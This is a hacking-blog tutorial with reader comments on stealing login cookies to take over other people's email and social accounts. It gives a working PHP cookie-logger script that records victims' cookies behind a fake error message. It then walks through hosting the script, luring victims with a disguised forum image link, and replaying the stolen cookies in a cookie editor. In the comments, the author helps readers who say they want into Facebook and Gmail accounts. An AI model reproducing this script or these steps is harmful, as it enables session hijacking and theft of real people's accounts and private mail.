Pin It

How to hack into an email account - cookie logger


Well one of the question which is asked most to me is,"How to hack into an email account",So today i am posting a new way to hack into an email account,I am not posting this post to exite hackers but to make you aware of whats going around.

Note: This Method Will Only work, if the target Site is Vulnerable to xss.

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?

A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.

Today I am going to show How to make your own Cookie Logger

Step 1
 First you have to create a file which can capture a person's cookie.So follow the following process.

Download the script

Step 2

 Now you have to change "http://rafayhackingarticles.blogspot.com" to your your site, Remember one thing you should not upload the files into a directory.

Now open notepad and paste the script in it and save it as fun.gif

Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:



$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>


Step 4:Create a new Notepad File and Save it as logfile.txt

Upload this file to your server

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

www.ofees.net
www.t35.com
www.ripway.com

Step 5:Go to the victim forum and insert this code in the signature or a post :


[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]


So the person who click it will think it is fun.jpg but it redirects to fun.gif

Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt


step 7
 And something like this will be stored in your "logfile.txt"

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9



Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

Now for this you will need a firefox addon named "Add and edit cookies"


Subscribe to our Newsletter and receive updates directly via email - Get Ethical hacking and security tips directly to your inbox. Alternatively you can Join our Hackers Community on Facebook , Google+ and Twitter .

At RHA Infosec we provide different types of Security Testing from small business sites to Corporate Sites. Click Here to know more about our complete list of services.

Subscribe to RHA


Enjoyed this article?
Subscribe to "Rafay Hacking Articles" and get daily updates in your inbox for free!


Tags:


Kindly Bookmark it and Share it with Friends:

53 comments :

Anonymous said...

Hi :)

I installed the Cookie Editor app but I still don't quite understand Step 8. Could you please elaborate?

Rafay Baloch on January 14, 2010 at 3:04 AM said...

@Anonymous
Have you got victims cookies?

MAX on January 25, 2010 at 8:06 AM said...

How to edit cookies plz suggest me!!!

Rafay Baloch on January 25, 2010 at 10:16 AM said...

@max
Have you got the cookies?

Anonymous said...

The thing you mentioned above is quite tricky to understand
step 4
and step 8 is quite hard to understand

Anonymous said...

where is victims form ??? how to go

do we have to upload all these 3 on our web and what is chmod where to post this or just upload in our side please answer?
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif

Rafay Baloch on February 3, 2010 at 12:28 AM said...

@Anonymous
Kindly tell me what dont understand in Step 4,you need to upload all three files to a web hosting service

Anonymous said...

Step 5:Go to the victim forum and insert this code in the signature or a post

from where we get the victim forum ???? and what is (chmod 777)

Anonymous said...

yeah i don't quite get part 8, the part about putting in values(what kind of values?). changing my cookies to be their cookies makes no sense :( how would i do that.

Anonymous said...

I uploaded the files now which URL am i to use?? My site is http://h1.ripway.com/TRIDEEB1492/

Azri92 on February 16, 2010 at 2:05 AM said...

can use anything other than "Edit Cookies"???

Rafay Baloch on February 25, 2010 at 12:49 AM said...

@Azri92
Yes there are many other tools but you can google them,but this is the simplest one

Rafay Baloch on February 25, 2010 at 12:50 AM said...

@Anonymous
The victims forum means that you can place the link on
orkut scrapbook,facebook wall or any forum

Anonymous said...

hey dude!
i already upload my the 3 files in my site then give the link to a forum but why does when i try to open the logfile (download) no txt or no any thing that put in it. it just empty. can u help me about this.

Anonymous said...

trojan file

Anonymous said...

Got some questions.

Say a guy clicks at your link. With a different code obviously, can you steal all of his cookies or just the cookie(s) of the page he was last in(the refferer site)? Can you even steal the passwords he might stored at his browser?

Sorry if my questions are questions of a noobie but I'm concerned about internet safety and privacy. TY!

Rafay Baloch on March 23, 2010 at 10:52 PM said...

@Anonymous
When the victim clicks on your link,you steal his cookies of the accounts through which the victim is logged in

Anonymous said...

step 8 question: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie.*where can i find my cookies?* You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.(what values am i going to substitute for the cookies?) *can u give me an example?, coz this cookie thing are new to me..*

Anonymous said...

hello dear, i am in a trouble..m not at all getting the things what u hv mentioned above in step 2.... where u hv wrote to replace 'http://rafayhackingarticles.blogspot.com' to my site...
i dont hv any site..so which one i have to put it..?
and again u wrote to open notepad and save it as fun.gif...
well i am already opened it up when m editing the url...right? so why to again open another notepad? and how do i save a text file into gif (image) format..m completely confused here..will u please explain?


then m again confused in step 5..dat victim will think its fun.jpg but it will redirects to fun.gif..?
so please let me know it clearely..m confused..!..sorry to disturb u..[:(]

Mister on June 22, 2010 at 2:15 AM said...

Please...I saved the script1 as fun.gif
but when i try to open it as mywebsite.com/fun.gif
it shows that it gots some errors
i'm using 0fees.net
then i renamed the file to fun.php
then when i tried to open it in web
it comes a blank page...and the logfile is blank too...
please can u give me a solution for that ?
:D thank you ! :]

speed on August 7, 2010 at 8:05 AM said...

i did every step very carefully but when i tried to hack my own account .. its not working ..... i saved all the files to root directory .. i just did every step the way u told... but when i posted it the way u said .. nd then when i clickd that signature or link to jpj image ... it opes a new web page as 'Adress not found' then i thought work i done .. but when i downloaded that logfile .. there was nothing in it ..

Its not working ....
wot to do???
reply AS soon as possible

nd yes i tried to hack my facebook account.. its not getting post on wall but u can message that signature...

Rafay Baloch on August 7, 2010 at 11:55 AM said...

Cookie stealing or session hijacking only work with those sites which have an xss vulnerability.

Anonymous said...

I thinks its quite simple.
1)you create a fake site and add the script
2)when a visitor visits your site, visitor's cookie will be copied into logfile.txt
3)you copy the file and replace your cookie with it.
4) so if you are able visit the site that user is currently logged in and also the cookie you just copied contains its session id then you can find your self logged in as that person


If you are on the same subnet you can use MIM using arpspoof,hamster,ferret to gain cookie info.

Rafay Baloch on August 14, 2010 at 7:54 AM said...

@Anonymous
Yes you 100% right.

Anonymous said...

Is there other way to get cookies?

Anonymous said...

Sorry i could not understand step 8 it is mentioned here "To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor." But how to get my cookie and where is it available and also how to get victims cookie and where is it available ? So, please elaborate on this .

Rafay Baloch on August 29, 2010 at 1:36 AM said...

@Anonymous
I see you dont have basic knowledge of cookie editing and cookie capturing, I recommend you reading my book
www.hacking-book.com

Dhruv on September 20, 2010 at 12:30 AM said...

What should be the CHMOD of the fun.gif file, cause I saved it by the CHMOD of 644 and when I open it I get the code of the fun.gif file on the screen and the logfile.txt remains empty..

Please reply, I entered the link of the fun.gif file in the url..

Rafay Baloch on September 20, 2010 at 12:57 AM said...

@Dhruv
Kindly change the permissions of the .txt file to 777 so it can write the traced cookies

Fowad Ahmed on October 8, 2010 at 8:05 AM said...

Thanx Brother...r yu pakistani???Ihv to discuss wv yu smthng really important..my mail address is fowad89@yahoo.com ...pls bro i'll b w8ing 4 ur mail....contact me asap...thanx G.B.U

Anonymous said...

Can I hack a blogspot account with this?

Anonymous said...

dude check Your script...i download it but its not working

john said...

I can't post that link in Facebook..it is marked as flagged..

Anonymous said...

I clicked the gif link myself and when i open my logfile.txt with my ftp client, its shows blank thing?

Anonymous said...

whre i'll recve the cookies dear i have done evrything as u said and sent plzz help me out!!!

MoSeBA on January 15, 2011 at 5:18 PM said...

i have done everything u said and upload them to my webhosting and i have changed the permissions (chmod) but nothing written in the logfile.txt
that's what appear when i press the /fun.gif
http://img600.imageshack.us/img600/3457/116201131423am.png

Rafay Baloch on January 16, 2011 at 12:36 AM said...

@MoSeBA
This hack works only on the forums/blogs which are vulnerable to XSS(Cross site scripting.Try finding a website/forum vulnerable to XSS and then try it.

Anonymous said...

whre i'll recve the cookies . i have done evrything as u said and sent plzz help me out!!! how can i change the cookies or wat should be cookies place

Anonymous said...

does it work on facebook and hotmail ?

Anuj Parihar on April 19, 2011 at 11:23 PM said...

[url=http://www.127.0.0.1/fun.gif][img]http://www.127.0.0.1/fun.jpg[/img][/url]

Anonymous said...

in step 2 change "http://rafayhackingarticles.blogspot.com" to your your site. i m not getting what is my site. how can make my site. already i hacked cookies from wireshark in a same nework in which i work. i also know to hack gmail password using forge page. but i m not getting what is my site. so please explain it briefly. not in a short way.
thanku

Anonymous said...

hi . i ve been using this (webhosting www.ripway.com) site. i ve a small problem i am not able create chmod777 log file ... could u help me with it :)

thanks

akram ...

Anonymous said...

hey i ve been using (www.ripway.com) but i ve got a problem in creating log file ... how do i make it chmod777 comptible???

thanks

akram

Anonymous said...

cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif






what is this and how can i upload it?

Tinkuforu on September 26, 2011 at 1:04 AM said...

I have done everything u said, but i didnt get the cookie into logfile...
If we click the signature, the error i am getting is "404 page not found"... Where could the error possibly be???
Kindly help me with this...Thanx in Advance...

Anonymous said...

I have done whatever u said bhai... Webhosting etc everything.... Instead of a victim when i paste it in address bar it says Your search - [url=http://www.samthedevil.biz.ly/fun.gif][img]http://www.samthedevil.biz.ly/fun.jpg[/img][/url] - did not match any documents.

manish bhattacharya on June 28, 2012 at 9:10 PM said...

add and edit add ons is not available in latest firefox..any other add on

Anonymous said...

i have done all the things u told but its not working..

Manpreet Singh on August 4, 2012 at 10:42 PM said...

facebook blocks the url:
[url=http://www.yoursite.com/fun.gif][img]http://yoursite.com/fun.jpg[/img][/url]
what should i do?

Anonymous said...

please i dont understand all this have try it but still it not working can you please explan it very well?

Anonymous said...

code is not recording anything on the logg file

mariya varghees on December 7, 2012 at 11:32 PM said...

Hack Your Friend Facebook account ,online password Hacking.. passwordhk.blogspot.com
Enjoy!

Milind Topno on June 23, 2014 at 8:16 AM said...

when i download the script it says the archive is corrupted or damaged

Dare to ask? :)

Blog Archive

 

Recent Comments

About

Rafay Baloch is an Independent security researcher, Internet marketer, Entrepreneur and a SEO consultant, He is the founder of RHA blog and multiple other blogs. Rafay got famous after finding a Remote Code Execution bug inside PayPal for which PayPal awarded him a sum of 10,000$ Read More..

Join In!

RHA © 2013. All Rights Reserved.